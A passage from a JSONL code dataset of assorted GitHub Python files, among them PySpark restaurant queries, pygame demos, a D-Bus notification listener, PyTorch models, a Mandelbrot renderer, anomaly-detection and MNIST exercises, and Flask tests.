task7.filter(task7.Has_Online_delivery == \"Yes\").groupBy(\"Has_Online_delivery\").count()\n task74= task7.filter(task7.Has_Online_delivery == \"No\").groupBy(\"Has_Online_delivery\").count()\n\n task99= task71.union(task72)\n task999=task73.union(task74)\n task999=task999.select(\"Has_Online_delivery\",\"count\").withColumnRenamed(\"count\",\"Counts\")\n\n task75=task99.join(task999)\n\n #task75=task71.join(task73)\n #task76= task73.join(task74)\n\n return task75\n \n#task71= task7.filter(task7.Has_Table_booking == \"Yes\").groupBy(\"Has_Table_booking\",\"Cuisine\").count().show(50,truncate=False)\n#task72= task7.filter(task7.Has_Table_booking == \"No\").groupBy(\"Has_Table_booking\",\"Cuisine\").count().show(50,truncate=False)\n\n\n#task73= task7.filter(task7.Has_Online_delivery == \"Yes\").groupBy(\"Has_Online_delivery\",\"Cuisine\").count().show(50,truncate=False)\n#task74= task7.filter(task7.Has_Online_delivery == \"No\").groupBy(\"Has_Online_delivery\",\"Cuisine\").count().show(50,truncate=False)\n\n\n\n# # 8. Which is most liked table booking or online delievery?\n\ndef task8():\n task8= Restaurant.select(\"Has_Table_booking\",\"Has_Online_delivery\")\n\n\n task81= task8.filter(task8.Has_Table_booking == \"Yes\").groupBy(\"Has_Table_booking\").count()\n\n task82= task8.filter(task8.Has_Online_delivery == \"Yes\").groupBy(\"Has_Online_delivery\").count()\n task82=task82.select(\"Has_Online_delivery\",\"count\").withColumnRenamed(\"count\",\"Counts\")\n task83=task81.join(task82)\n return task83\n# # 9. Display cuisine having price rating 2 and food rating above 4?\n\ndef task9():\n task9= Foods.join(Cost, \"Country_Code\").select(\"Cuisine\",\"Price_range\",\"Rating\")\n\n\n task92= task9.select(\"Rating\",\"Price_range\",explode(task9.Cuisine)).withColumnRenamed(\"col\",\"Cuisine\")\n\n task93= task92.filter((task92.Price_range<2)& (task92.Rating>4.5)) \n return task93\n\n\n# # 10. Count Resturants having no table booking and online delievery but excellent ratings.\n\ndef task10():\n task10= Restaurant.join(Foods, \"Country_Code\")\n#task10.show(2)\n\n task11= task10.filter((task10.Has_Table_booking == \"No\") & (task10.Has_Online_delivery == \"No\") & (task10.Rating_text == \"Excellent\"))\n task12=task11.select(count(\"Restaurant_Name\"))\n return task12\n\n\n# 12. Food rating and cost per person of countries having per capita income below 5000 \n\ndef task12():\n task11= Foods.join(Cost_new,\"Country_Code\").join(Country, \"Country_Code\")\n task11=task11.withColumnRenamed('Per_Capita_Income(USD)', \"PCI\")\n task111= task11.select(\"Rating\", \"Cost_USD\",'PCI').filter(task11.PCI<5000).distinct()\n print(task111.show())\n return task111\n\n# 13. Which location/ city in a country is most profitable (has high orders) ?\n\ndef task13():\n task13= Restaurant.join(Country, \"Country_Code\")\n task131= task13.filter(task13.Country==\"India\")\n task132= task131.groupBy(\"Restaurant_Name\",\"City\").count().sort(col(\"count\").desc())\n task134= task131.filter(task131.Restaurant_Name == \"Cafe Coffee Day\").groupBy(\"City\").count()\n print(task134.show())\n\n return(task134)\n\n # 14. Restaurants having most number of branches.\n\ndef task14():\n task14= Restaurant.select(\"Restaurant_Name\",\"City\").distinct()\n task141= task14.groupBy(\"Restaurant_Name\").count().sort(col(\"count\").desc())\n print(task141.show())\n\n return(task141)\n\n\n\n\n\n\n","repo_name":"dpka09/Pipeline","sub_path":"dags/transformation.py","file_name":"transformation.py","file_ext":"py","file_size_in_byte":8978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74749635729","text":"import time\n\nimport pygame_menu\n\nfrom react import GameEngine\n\n\ndef reset_menu_selection(menu):\n menu.select_widget(None)\n\n\ndef led_check(menu, game_engine: GameEngine, check_time: int):\n \"\"\"Turn on all led for check_time seconds\"\"\"\n print(\"Start led_check\")\n\n start = time.time()\n elapsed = lambda: time.time() - start\n\n game_engine.lights.on()\n while elapsed() <= check_time:\n time.sleep(1)\n\n game_engine.lights.off()\n reset_menu_selection(menu)\n print(\"Done led_check\")\n\n\ndef led_button_check(menu, game_engine: GameEngine):\n \"\"\"Light up the buttons 1 by 1 to verify that it all work\"\"\"\n print(\"Start led_button_check\")\n game_engine.button_test()\n print(\"Done led_button_check\")\n reset_menu_selection(menu)\n\n\ndef init_settings_menu(on_close_cb, game_engine) -> \"pygame_menu.Menu\":\n theme_menu = pygame_menu.themes.THEME_BLUE.copy()\n theme_menu.scrollbar_cursor = pygame_menu.locals.CURSOR_HAND\n\n # Main menu, pauses execution of the application\n menu = pygame_menu.Menu(\n height=400, onclose=on_close_cb, theme=theme_menu, title=\"Main Menu\", width=600\n )\n\n cheat_sub_menu = pygame_menu.Menu(\n height=400, onclose=on_close_cb, theme=theme_menu, title=\"Cheat Menu\", width=600\n )\n\n # Led check\n led_check_time = 30 # sec\n menu.add.button(\n f\"Led check ({led_check_time} sec)\",\n led_check,\n menu,\n game_engine,\n led_check_time,\n )\n\n menu.add.button(\n f\"Led & Button check\",\n led_button_check,\n menu,\n game_engine,\n )\n\n menu.add.button(\"Cheat Menu\", cheat_sub_menu)\n\n cheat_sub_menu.add.button(\"What were you expecting?!\")\n\n menu.add.button(\"Exit Game\", pygame_menu.events.EXIT)\n return menu\n","repo_name":"bagerard/Whack-A-Pi","sub_path":"settings_menu.py","file_name":"settings_menu.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16279919409","text":"# works,needs eavesdrop='true'\n\nfrom gi.repository import Gtk\nimport dbus\nfrom dbus.mainloop.glib import DBusGMainLoop\n \ndef msg_filter(_bus, msg):\n if msg.get_member() != \"Notify\":\n return\n args = msg.get_args_list()\n print(\"%s:%s\" % (args[3], args[4]))\n \nif __name__ == '__main__':\n DBusGMainLoop(set_as_default = True)\n bus = dbus.SessionBus()\n bus.add_match_string(\"interface='org.freedesktop.Notifications',eavesdrop='true'\")\n bus.add_message_filter(msg_filter)\n Gtk.main()","repo_name":"hevi9/etc-python","sub_path":"dbus/grab_notify4.py","file_name":"grab_notify4.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"26510904013","text":"# https://github.com/CUAI/Non-Homophily-Benchmarks/blob/main/models.py\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch_geometric.nn import GCNConv, JumpingKnowledge\n# from torch_geometric.nn.conv.gcn_conv import gcn_norm\n# import scipy.sparse\n# import numpy as np\n\nclass GCNJK(nn.Module):\n def __init__(self, \n edge_index,\n norm_A,\n in_channels, \n hidden_channels, \n out_channels, \n num_layers=2,\n dropout=0.5, \n jk_type='max'\n ):\n super(GCNJK, self).__init__()\n self.norm_A = norm_A\n self.edge_index = edge_index\n\n self.convs = nn.ModuleList()\n self.convs.append(\n GCNConv(in_channels, hidden_channels, cached=False, normalize=False))\n\n self.bns = nn.ModuleList()\n self.bns.append(nn.BatchNorm1d(hidden_channels))\n for _ in range(num_layers - 2):\n self.convs.append(\n GCNConv(hidden_channels, hidden_channels, cached=False, normalize=False))\n self.bns.append(nn.BatchNorm1d(hidden_channels))\n\n self.convs.append(\n GCNConv(hidden_channels, hidden_channels, cached=False, normalize=False))\n\n self.dropout = dropout\n self.activation = F.relu\n self.jump = JumpingKnowledge(jk_type, channels=hidden_channels, num_layers=1)\n if jk_type == 'cat':\n self.final_project = nn.Linear(hidden_channels * num_layers, out_channels)\n else: # max or lstm\n self.final_project = nn.Linear(hidden_channels, out_channels)\n\n\n def reset_parameters(self):\n for conv in self.convs:\n conv.reset_parameters()\n for bn in self.bns:\n bn.reset_parameters()\n self.jump.reset_parameters()\n self.final_project.reset_parameters()\n\n def predict(self, x):\n with torch.no_grad():\n self.eval()\n xs = []\n for i, conv in enumerate(self.convs[:-1]):\n x = conv(x, self.edge_index, edge_weight=self.norm_A)\n x = self.bns[i](x)\n x = self.activation(x)\n xs.append(x)\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = self.convs[-1](x, self.edge_index, edge_weight=self.norm_A)\n xs.append(x)\n x = self.jump(xs)\n x = self.final_project(x)\n return x\n\n def forward(self, x):\n xs = []\n for i, conv in enumerate(self.convs[:-1]):\n x = conv(x, self.edge_index, edge_weight=self.norm_A)\n x = self.bns[i](x)\n x = self.activation(x)\n xs.append(x)\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = self.convs[-1](x, self.edge_index, edge_weight=self.norm_A)\n xs.append(x)\n x = self.jump(xs)\n x = self.final_project(x)\n x = F.log_softmax(x, dim=1)\n return x","repo_name":"yuziGuo/ClenshawGNN","sub_path":"models/GCNJK.py","file_name":"GCNJK.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"878967255","text":"# coding=utf-8\n\"\"\"\"\nAuthors:\n Bruno Beljo\n Antonio Boban\n Anton Ilic\n\nDescription:\n Computing of Mandelbrot set using serial computing\n\nData types:\n width = int Image width\n height = int Image height\n x1 = float minimum X-Axis value\n x2 = float maximum X-Axis value\n y1 = float minimum Y-Axis value\n y2 = float maximum Y-Axis value\n maxit = int maximum interation\n\nTest values:\n width, height = 500, 250\n x1, x2 = -2.0, 1.0\n y1, y2 = -1.0, 1.0\n maxit = 141\n\nRunning instruction:\n Code runs in Linux terminal\n Structure:\n python3 mandelbrot_s.py width height x1 x2 y1 y2 maxit change_color\n Example:\n python3 mandelbrot_p.py 1024 1024 -0.74877 -0.74872 0.065053 0.065103 2048 3\n\"\"\"\nfrom functions import *\nimport time\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport os\nimport sys\n\n\"\"\"makes using -h parameter possible by ignoring other arguments.\nIf there are more arguments, takes their input into compution\n\"\"\"\nif len(sys.argv) == 2:\n help_menu()\nelse:\n width = int(sys.argv[1]) #Image width\n height = int(sys.argv[2]) #Image height\n x1 = float(sys.argv[3]) #x axis minimum\n x2 = float(sys.argv[4]) #x axis maximum\n y1 = float(sys.argv[5]) #y axis minimum\n y2 = float(sys.argv[6]) #x axis maximum\n maxit = int(sys.argv[7]) #maximum number of iterations\n c = int(sys.argv[8]) #color mode\n\n#Printing arguments used code was ran\nprint(\"Parameters:\")\nprint(\"\\tOutput: \", os.path.relpath('mandelbrot_serial.png', start=\"./file.txt\"))\nprint(\"\\tImage width: \", width)\nprint(\"\\tImage height:\", height)\nprint(\"\\tX-Axis minimum:\", x1)\nprint(\"\\tX-Axis maximum:\", x2)\nprint(\"\\tY-Axis minimum: \", y1)\nprint(\"\\tY-Axis maximum: \", y2)\nprint(\"\\tIterations: \", maxit)\n\n#Calculating execution time\nstart = time.time ()\nprint(\"Computing...\")\n\nC = np.zeros([height, width], dtype='i')\ndx = (x2-x1)/width\ndy = (y2-y1)/height\n\nfor i in range(height):\n y = y1 + i * dy\n for j in range(width):\n x = x1 + j * dx\n C[i,j] = mandelbrot(x, y, maxit)\n\n# Time calculation result\nend = time.time()\nprint(\"Computing finished in \", end - start, \"seconds.\")\n\n#Graphing\nprint(\"Building image...\")\nplt.imshow(change_colors(c,C), aspect='equal', cmap=plt.cm.gnuplot2, interpolation='bilinear', extent=(x1, x2, y1, y2))\nplt.title('Mandelbrot set using serial computing')\nplt.xlabel('Real')\nplt.ylabel('Imaginary')\n\nplt.savefig('mandelbrot_serial.png', dpi=1000)\nplt.show()\n\n#Relative path\npath = os.path.relpath('mandelbrot_serial.png', start=\"./file.txt\")\nprint(\"Image save path: \", path)","repo_name":"ailic96/mandelbrot","sub_path":"mandelbrot_s.py","file_name":"mandelbrot_s.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21629538480","text":"\"\"\"\r\n案例1: 检测异常服务器\r\n数据集:data/ex8data1.mat\r\n注:算法手动实现\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport scipy.io as sio\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef estimate_gaussian(X, isCovariance): # 计算均值与协方差矩阵\r\n means = np.mean(X, axis=0)\r\n if isCovariance:\r\n sigma2 = (X - means).T @ (X - means) / len(X) # 主对角线上的数值是方差,其他是协方差,也可用sigma=np.cov(X.T)\r\n else:\r\n sigma2 = np.var(X, axis=0) # np.var计算方差\r\n return means, sigma2\r\n\r\n\r\ndef gaussian_distribution(X, means, sigma2):\r\n if np.ndim(sigma2) == 1: # 数组维度是2,为原高斯分布模型\r\n sigma2 = np.diag(sigma2)\r\n\r\n X = X - means\r\n n = X.shape[1]\r\n\r\n first = np.power(2 * np.pi, -n / 2) * (np.linalg.det(sigma2) ** (-0.5))\r\n second = np.diag(X @ np.linalg.inv(sigma2) @ X.T)\r\n p = first * np.exp(-0.5 * second)\r\n p = p.reshape(-1, 1) # 转为(n,1)\r\n\r\n return p\r\n\r\n\r\ndef plotGaussian(X, means, sigma2):\r\n plt.figure()\r\n x = np.arange(0, 30, 0.5)\r\n y = np.arange(0, 30, 0.5)\r\n xx, yy = np.meshgrid(x, y)\r\n z = gaussian_distribution(np.c_[xx.ravel(), yy.ravel()], means, sigma2) # 计算对应的高斯分布函数\r\n zz = z.reshape(xx.shape)\r\n plt.plot(X[:, 0], X[:, 1], 'bx')\r\n contour_levels = [10 ** h for h in range(-20, 0, 3)]\r\n plt.contour(xx, yy, zz, contour_levels)\r\n\r\n\r\ndef select_threshold(yval, p):\r\n bestEpsilon = 0\r\n bestF1 = 0\r\n epsilons = np.linspace(min(p), max(p), 1000)\r\n for e in epsilons:\r\n p_ = p < e\r\n tp = np.sum((yval == 1) & (p_ == 1))\r\n fp = np.sum((yval == 0) & (p_ == 1))\r\n fn = np.sum((yval == 1) & (p_ == 0))\r\n prec = tp / (tp + fp) if (tp + fp) else 0 # precision 精确度\r\n rec = tp / (tp + fn) if (tp + fn) else 0 # recall召回率\r\n F1_e = 2 * prec * rec / (prec + rec) if (prec + rec) else 0 # F1score\r\n if F1_e > bestF1:\r\n bestF1 = F1_e\r\n bestEpsilon = e\r\n return bestEpsilon, bestF1\r\n\r\n\r\nif __name__ == '__main__':\r\n mat = sio.loadmat('data/ex8data1.mat') # dict_keys(['__header__', '__version__', '__globals__', 'X', 'Xval', 'yval'])\r\n X = mat.get('X') # X-->(307,2)\r\n X_val, y_val= mat['Xval'], mat['yval']\r\n # 原高斯分布模型\r\n means, sigma2 = estimate_gaussian(X, isCovariance=False)\r\n plotGaussian(X, means, sigma2)\r\n\r\n # 多元高斯分布模型\r\n means, sigma2 = estimate_gaussian(X, isCovariance=True)\r\n plotGaussian(X, means, sigma2)\r\n # 通过交叉验证集选取阈值ε\r\n p_val = gaussian_distribution(X_val, means, sigma2)\r\n bestEpsilon, bestF1 = select_threshold(y_val, p_val)\r\n print(bestEpsilon, bestF1)\r\n\r\n p = gaussian_distribution(X, means, sigma2)\r\n anoms = np.array([X[i] for i in range(X.shape[0]) if p[i] < bestEpsilon])\r\n print(len(anoms))\r\n print('sss',anoms)\r\n plotGaussian(X, means, sigma2)\r\n plt.scatter(anoms[:, 0], anoms[:, 1], c='r', marker='o')\r\n\r\n # plt.plot(X[:, 0], X[:, 1], 'bx')\r\n plt.show()\r\n\r\n\r\n# -------------案例2: 高维数据的异常检测 数据集:data/ex8data1.mat-------------------\r\n mat_h = sio.loadmat('data/ex8data2.mat') # dict_keys(['__header__', '__version__', '__globals__', 'X', 'Xval', 'yval'])\r\n X2 = mat_h['X']\r\n X_val2, y_val2 = mat_h['Xval'], mat_h['yval']\r\n print(X2.shape,X_val2.shape,y_val2.shape)\r\n means_h,sigma2_h = estimate_gaussian(X2, isCovariance=True)\r\n pval = gaussian_distribution(X_val2, means_h, sigma2_h)\r\n bestEpsilon_h, bestF1_h = select_threshold(y_val2, pval)\r\n p_h = gaussian_distribution(X2,means_h,sigma2_h)\r\n anoms_h = np.array([X2[i] for i in range(X2.shape[0]) if p_h[i] < bestEpsilon_h])\r\n print(len(anoms_h))\r\n","repo_name":"giser-z/Coursera-ML-AndrewNg-Exercises","sub_path":"ex8-anomaly detection and recommendation/01-异常检测.py","file_name":"01-异常检测.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5586421590","text":"\nimport torch\nfrom torch import nn\nimport torchvision\nfrom torch import optim\nfrom torch.nn import functional as F\n\nfrom matplotlib import pyplot as plt\nfrom utils import plot_image, plot_curve, one_hot\n\nbatch_size = 512\nlr=0.1\ntrain_loader = torch.utils.data.DataLoader(\n torchvision.datasets.MNIST('mnist_data',train=True,download=True,\n transform=torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(\n (0.1307,), (0.3081,))\n ])),\n batch_size = batch_size, shuffle=True)\n\ntest_loader = torch.utils.data.DataLoader(\n torchvision.datasets.MNIST('mnist_data',train=False,download=True,\n transform=torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(\n (0.1307,),(0.3081,))\n ])),\n batch_size = batch_size,shuffle=False)\n\n# x, y = next(iter(train_loader))\n# print(x.shape, y.shape, x.min(), x.max())\n# plot_image(x, y, 'image_MNIST')\n\nclass Net(nn.Module):\n\n def __init__(self):\n super(Net, self).__init__()\n #[b, 1, 28, 28]\n #h1=w1*x+b1\n self.fc1 = nn.Linear(28*28,256)\n self.fc2 = nn.Linear(256, 128)\n #h2=w2*h1+b2\n self.fc3 = nn.Linear(128,64)\n #h3=w3*h2+b3\n self.fc4 = nn.Linear(64,10)\n\n def forward(self, x):\n # [b, 1, 28, 28]\n x=F.relu(self.fc1(x))\n x=F.relu(self.fc2(x))\n x=F.relu(self.fc3(x))\n x=self.fc4(x)\n\n return x\n\nnet = Net()\noptimize = optim.SGD(net.parameters(), lr=lr, momentum=0.9)\ntrain_loss = []\nfor epoch in range(3):\n for bach_idx ,(x, y) in enumerate(train_loader):\n # print(x.shape, y.shape)\n # break\n #x:[b, 1, 28, 28] y:[512]\n #x:[b, 1, 28, 28]=>[b,28*28]\n x = x.view(x.size(0),-1)\n #b[b,10]\n x = net(x)\n #y =>[b,10] one hot\n y_onehot = one_hot(y)\n loss = F.mse_loss(x, y_onehot)\n\n optimize.zero_grad()\n loss.backward()\n optimize.step()\n train_loss.append(loss.item())\n if bach_idx % 10 == 0:\n print(epoch, bach_idx, loss.item())\n\n\nplot_curve(train_loss)\n\ncorrect_num = 0\nfor x,y in test_loader:\n #[b, 1, 28, 28]\n x = x.view(x.size(0),-1)\n #[b,10]\n out = net(x)\n pred=out.argmax(dim=1)\n correct_num += pred.eq(y).sum().float().item()\nprint('x:', x.shape, 'out:', out.shape, 'pred:',pred.shape, 'y:', y.shape)\ntotal_num = len(test_loader.dataset)\nacc = correct_num / total_num\nprint('acc:', acc, 'ir:',lr,'loss:',loss.item())\n\nx, y =next(iter(test_loader))\nout = net(x.view(x.size(0),-1))\npred = out.argmax(dim=1)\nplot_image(x, pred, 'test')\n","repo_name":"DowsWang/MNIST","sub_path":"main_nn.py","file_name":"main_nn.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40278789383","text":"\"\"\"\nURL: http://www.pythonchallenge.com/pc/def/map.html\n\n\"\"\"\n\n\nclue = \"\"\"\ng fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc dmp.\nbmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq rcvr gq qm jmle.\nsqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu ynnjw ml rfc spj.\n\"\"\".replace('\\n', ' ').strip()\n\n\ndef maketrans(secret):\n literals = set([' ', ')', '(', '.', \"'\"])\n out = []\n for i in secret:\n if i in literals:\n out.append(i)\n else:\n ni = ord(i) + 2\n if ni > 122:\n di = ni - 122 - 1\n ni = 97 + di\n out.append(chr(ni))\n return ''.join(out)\n\n\nprint(maketrans(clue))\nprint(maketrans('map'))\n","repo_name":"cr8ivecodesmith/sharp_saw","sub_path":"pychallenge/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42326151003","text":"from __future__ import division\nk= \"nama saya\"\nl=\"heruzaman\"\n\n# print\nprint(\"OK\")\nprint(k,end=\" \")\n\n#Reading from keyboared\nx=input(\"something:\")\nprint(x)\n\n# raise exceprion\n# raise IOError(\"File error\")\n\n# argument in exception\n# except Myerror as err:\n\n# next() function\ngen=(letter for letter in 'HELOWORLD')\nnext(gen)\n\ndef area(x,y=3.14): #Fo\n return \"ok\"\n\nprint(area(1,1))\n\n","repo_name":"syamsofa/belajarpython","sub_path":"basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36691410618","text":"from choice_file import choice_number_file\n\n\ndef change_row():\n nf = choice_number_file()\n with open(f\"db/data_{nf}.txt\", \"r\", encoding=\"utf-8\") as file:\n data = file.readlines()\n count_rows = len(data)\n if count_rows == 0:\n print(\"File is empty!\")\n else:\n number_row = int(input(f\"Enter the row number \" f\"from 1 to {count_rows}: \"))\n while number_row < 1 or number_row > count_rows:\n number_row = int(\n input(f\"Error!\" f\"Enter the row number \" f\"from 1 to {count_rows}: \")\n )\n name = input(\"Enter your name: \")\n surname = input(\"Enter your surname: \")\n date_of_birth = input(\"Enter date of birth: \")\n location = input(\"Enter your location: \")\n data[number_row - 1] = f'{number_row};{name};{surname};{date_of_birth};{location}\\n'\n with open(f\"db/data_{nf}.txt\", \"w\", encoding=\"utf-8\") as file:\n file.writelines(data)\n print('line updated successfully')","repo_name":"Aberezhnoy1980/python_practice","sub_path":"seminar008/change_data.py","file_name":"change_data.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26708955121","text":"import pytest\nfrom server import app\n\n\n@pytest.fixture\ndef client():\n app.config['TESTING'] = True\n client = app.test_client()\n yield client\n\n\n@pytest.fixture\ndef club_fixture():\n data = {\n \"name\": \"Iron Temple\",\n \"email\": \"admin@irontemple.com\",\n \"points\": \"4\"\n }\n return data\n\n\ndef test_login_then_purchase_places(client, club_fixture):\n result = client.post('/showSummary', data=club_fixture)\n expected = \"Welcome, \" + str(club_fixture[\"email\"])\n data_1 = {'competition': 'Test Event', 'club': club_fixture[\"name\"], 'places': 2}\n asking = client.post('/purchasePlaces', data=data_1)\n total_points = int(club_fixture[\"points\"]) - int(data_1[\"places\"])\n response = 'Points available: ' + str(total_points)\n assert expected.encode() in result.data\n assert b'Great-booking complete!' in asking.data\n assert response.encode() in asking.data\n\n\ndef test_ended_competition_then_logout(client, club_fixture):\n competition = 'Fall Classic'\n result = client.get('/book/'+str(competition)+'/'+str(club_fixture[\"name\"]))\n assert b'COMPETITION OVER' in result.data\n logout = client.get('/logout')\n assert logout.status_code == 302\n\n\ndef test_purchase_then_check_points_display(client, club_fixture):\n data_1 = {'competition': 'Test Event', 'club': club_fixture['name'], 'places': 2}\n client.post('/purchasePlaces', data=data_1)\n new_points = str(int(club_fixture[\"points\"]) - int(data_1[\"places\"]))\n result = client.get('/points')\n assert new_points.encode() in result.data\n\n\ndef test_try_more_than_12_then_get_full_points(client, club_fixture):\n data = {'competition': 'Test Event', 'club': club_fixture[\"name\"], 'places': 13}\n result = client.post('/purchasePlaces', data=data)\n assert b'PAS PLUS DE 12 PLACES PAR CLUB' in result.data\n display = client.get('/points')\n expected_points = str(club_fixture['points'])\n assert expected_points.encode() in display.data","repo_name":"akfio/OCProjet-11","sub_path":"test/test_integrations/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16717870175","text":"# pygame.mask module\n# https://www.pygame.org/docs/ref/mask.html\n#\n# Get the average Color of a Surface ignoring transparent pixels\n# https://stackoverflow.com/questions/69876220/get-the-average-color-of-a-surface-ignoring-transparent-pixels/70056421#70056421) v\n#\n# GitHub - Mask - Mask count pixel\n# https://github.com/Rabbid76/PyGameExamplesAndAnswers/blob/master/documentation/pygame/pygame_mask.mdightObject\n\nimport pygame\n\ndef get_averqge_color(surf):\n color = pygame.transform.average_color(surf, surf.get_rect())\n pxiel_count = pygame.mask.from_surface(surf).count()\n scale = surf.get_width() * surf.get_height() / pxiel_count\n print(color, scale, pxiel_count)\n return (round(color[0]*scale), round(color[1]*scale), round(color[2]*scale))\n\npygame.init()\nwindow = pygame.display.set_mode((400, 400))\nclock = pygame.time.Clock()\nfont = pygame.font.SysFont(None, 70)\n\ntest_surface = pygame.Surface((300, 300))\ntest_surface.set_colorkey((0, 0, 0))\npygame.draw.rect(test_surface, (255, 0, 0), (50, 50, 100, 100))\npygame.draw.rect(test_surface, (0, 255, 0), (150, 50, 100, 100))\npygame.draw.rect(test_surface, (255, 255, 0), (50, 150, 100, 100))\npygame.draw.rect(test_surface, (0, 0, 255), (150, 150, 100, 100))\n\navg_color = get_averqge_color(test_surface)\ncolor_text = font.render(f\"{avg_color[0]} {avg_color[1]} {avg_color[2]}\", True, \"black\")\n\nbackground = pygame.Surface(window.get_size())\nts, w, h, c1, c2 = 80, *window.get_size(), (160, 160, 160), (96, 96, 96)\ntiles = [((x*ts, y*ts, ts, ts), c1 if (x+y) % 2 == 0 else c2) for x in range((w+ts-1)//ts) for y in range((h+ts-1)//ts)]\n[pygame.draw.rect(background, color, rect) for rect, color in tiles]\n\nrun = True\nwhile run:\n clock.tick(100)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False \n\n window.blit(background, (0, 0))\n rect = test_surface.get_rect(center = window.get_rect().center)\n window.blit(test_surface, rect)\n pygame.draw.rect(window, \"black\", rect, 5, 5)\n window.blit(color_text, color_text.get_rect(center = rect.center))\n pygame.display.flip()\n\npygame.quit()\nexit()","repo_name":"Rabbid76/PyGameExamplesAndAnswers","sub_path":"examples/minimal_examples/pygame_minimal_mask_count_pixel_1.py","file_name":"pygame_minimal_mask_count_pixel_1.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"66"} +{"seq_id":"39528908698","text":"import json\n\n# listens for the client input\nclient_id = input(\"Enter your client_id: \")\nclient_secret = input(\"Enter your client_secret: \")\nuser_agent = 'rdt_client'\n\nsettings = {\n 'cache_size': 10,\n 'cache_location': 'cache/',\n 'default_sub': 'wallpapers',\n \"subreddits\": [\"wallpapers\", \"earthporn\", \"cozyplaces\"]\n}\npraw_auth = {\n 'client_id': client_id.strip(),\n 'client_secret': client_secret.strip(),\n 'user_agent': user_agent\n}\n\n# generates master json\nconfig_json = {\n \"settings\": settings,\n \"praw_auth\": praw_auth\n}\n\n# writes to JSON\nwith open(\"config/config.json\", \"w\") as p:\n json.dump(config_json, p, indent=4)\n","repo_name":"najeemk/RDTimg","sub_path":"generate_config.py","file_name":"generate_config.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73424589009","text":"'''\n- 0 : 양\n- 1 : 늑대\n\ndfs 순회\n(11/18)개만 통과\n'''\nresult=1\n\ndef dfs(info,graph,x,sheep,wolf,visited):\n global result\n\n if sheep<=wolf:\n return None,None,None\n visited[x]=1\n print(\"x,sheep,wolf:\",x,sheep,wolf)\n\n for i in graph[x]:\n if not visited[i]:\n print(\"i:\",i)\n # 양 만남\n if info[i]==0:\n result+=1\n print(\"result:\",result)\n dfs(info,graph,i,sheep+1,wolf,visited)\n # 늑대 만남\n else:\n dfs(info, graph, i, sheep,wolf+1, visited)\n return result,wolf,visited\n\ndef solution(info, edges):\n graph = [[] for _ in range(len(info))]\n parent = [0]*len(info)\n for a,b in edges:\n graph[a].append(b)\n graph[b].append(a)\n parent[b]=a\n visited = [0]*len(info)\n visited[0]=1\n sheep, wolf, visited = dfs(info,graph,0,1,0,visited)\n for i in range(len(info)):\n if not visited[i]:\n dfs(info,graph,parent[i],sheep,wolf,visited)\n return result\n\n#print(solution([0,0,1,1,1,0,1,0,1,0,1,1],[[0,1],[1,2],[1,4],[0,8],[8,7],[9,10],[9,11],[4,3],[6,5],[4,6],[8,9]]))\nprint(solution([0,1,0,1,1,0,1,0,0,1,0],[[0,1],[0,2],[1,3],[1,4],[2,5],[2,6],[3,7],[4,8],[6,9],[9,10]]))\n#print(solution([0,1,1,0,0,0,1,1,0],[[0,1],[0,5],[1,3],[5,7],[5,2],[2,4],[2,6],[4,8]]))\n#print(solution([0,1,0,1,1,1,1,0,1,1,0],[[0,4],[0,2],[4,7],[7,1],[4,1],[2,5],[2,8],[5,6],[5,9],[6,10]]))","repo_name":"dbswl4951/baekjoon_algorithm","sub_path":"kakao/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27163164309","text":"import re\nfrom pathlib import Path\n\nfrom app.error.inconsistent_upload_error import InconsistentDatasetError\nfrom app.main.jobs.utils.yml_templates.registry import register_dataset_adapter\nfrom app.main.jobs.utils.yml_abstractions.annotation import Annotation\nfrom app.main.models.enumerates import DatasetTypesEnum\nfrom config.constants import VOC_ROOT_FOLDER\n\n\nclass BaseDatasetAdapter:\n \"\"\"\n Provides methods for dealing with a dataset.\n\n Adding a new dataset type:\n 1. 